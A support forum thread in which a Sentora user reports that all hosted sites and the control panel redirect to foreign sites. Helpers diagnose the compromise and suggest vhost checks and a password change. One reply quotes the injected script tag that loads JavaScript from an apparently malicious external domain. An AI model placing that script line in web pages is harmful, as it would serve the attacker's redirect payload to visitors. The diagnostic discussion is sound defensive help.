This forum uses cookies
This forum makes use of cookies to store your login information if you are registered, and your last visit if you are not. Cookies are small text documents stored on your computer; the cookies set by this forum can only be used on this website and pose no security risk. Cookies on this forum also track the specific topics you have read and when you last read them. Please confirm whether you accept or reject these cookies being set.

A cookie will be stored in your browser regardless of choice to prevent you being asked this question again. You will be able to change your cookie settings at any time using the link in the footer.

Suddenly all sites are being redirected to different url
Suddenly all sites are being redirected to different url
Hi,

I think some sort of attack did this, suddenly my all sites, even control panel are redirecting to another site, I am not sure who did this and how, but i am unable to find any redirects in virtual host files, htaccess etc.

All of the sites are behaving the same way.  Some of the details are below.

Panel Domain: server2.afterdoor.com
Ip: 23.227.163.211
Ubuntu 14.04

Some of the hosted websites

afterdoor.com
mivapps.com

Everything is being redirected to another site.

Please help me out in this issue it's kind of urgent.

Thanks
Thanks given by:
RE: Suddenly all sites are being redirected to different url
(06-03-2019, 03:26 PM)damanmokha Wrote: Hi,

I think some sort of attack did this, suddenly my all sites, even control panel are redirecting to another site, I am not sure who did this and how, but i am unable to find any redirects in virtual host files, htaccess etc.

Ubuntu 14.04

afterdoor.com
mivapps.com

Thanks

You seem to have a script that has been added to your web pages at the very top, sometimes several times:

Code:
<script type='text/javascript' async src='https://css.developmyredflag.top/sjquery.min.js?style=prime&'></script>

Is it possible for you to check if this has been added to the actual html files on your server or if it is being added dynamically somewhere?

You will know exactly what your server setup is, and the rest of us can only guess as to whether you have other people accessing your Sentora account, or other people accessing your server, and whether you are running a secure Sentora server of if you have tried upgrading PHP etc. which may have left a vulnerability. It's always possible that someone has found a way in that has been previously unknown, or it may be via a vulnerable script that you have on one of your sites... could be so many things but in a word I would describe it as some sort of "hack".

Keith

EDIT: If your signature is correct and you really are running Sentora 1.0.0, the current release is 1.0.3. Therefore you are incredibly out of date.
Thanks given by:

Ubuntu 14.04

afterdoor.com
mivapps.com

Thanks

I tried accessing your panel (server2.afterdoor.com) which attempts to load theguardiantech.com with no success.

afterdoor.com seems to load includemylife.info
mivapps.com is correctly loaded.

Check again your panel and afterdoor.com vhosts.

Can you access the panel via local IP? If so:

Admin > Module Admin > Apache Config

Whats in your Global Sentora Entry ?
1) If the field is blank, enter a comment (adding a single # character into the text field) so we can update the VirtualHost entry.

[Image: sentora-global-vhost.PNG]

2) Click Save Changes
3) Wait 5-10 minutes and check if your panel or other sites are loading properly in a private browsing window (to avoid loading a cached page).

You can calso Override a Virtual Host Setting for afterdoor.com on the Apache Config page.

If you are not able to access your panel investigate manually your vhost config files located at /etc/sentora/panel/configs/apache

First check httpd.conf and secondly check httpd-vhosts.conf

If your panel and afterdoor.com vhosts entries look good (you can send them to me if you like) try removing your htaccess and renaming and replacing the index file.
Thanks given by:

Ubuntu 14.04

afterdoor.com
mivapps.com

Thanks

Looks like you got the problem sorted.

It would be good to know what you found and how it was being caused - in case it is something in Sentora that needs attention.

Keith.
Thanks given by:
I just checked it and it's redirecting. I suggest once you fix it, change your all your server access passwords.
-TGates - Project Council

SEARCH the Forums or read the DOCUMENTATION before posting!
Support Sentora and Donate: HERE

Find my support or modules useful? Donate to TGates HERE
Developers and code testers needed!
Contact TGates for more information
Thanks given by:

Possibly Related Threads…
Thread Author Replies Views Last Post
Having both HTTP & HTTPS (Port 443 and Port 80) sites on a server dsmarter 14 41 ,740 08-22-2020, 02:49 PM
Last Post: kenzopoker1
slow sites kewldude12 0 2 ,009 07-20-2020, 04:40 AM
Last Post: kewldude12
suddenly cannot connect database david4321 1 5 ,269 04-12-2017, 08:11 PM
Last Post: Me.B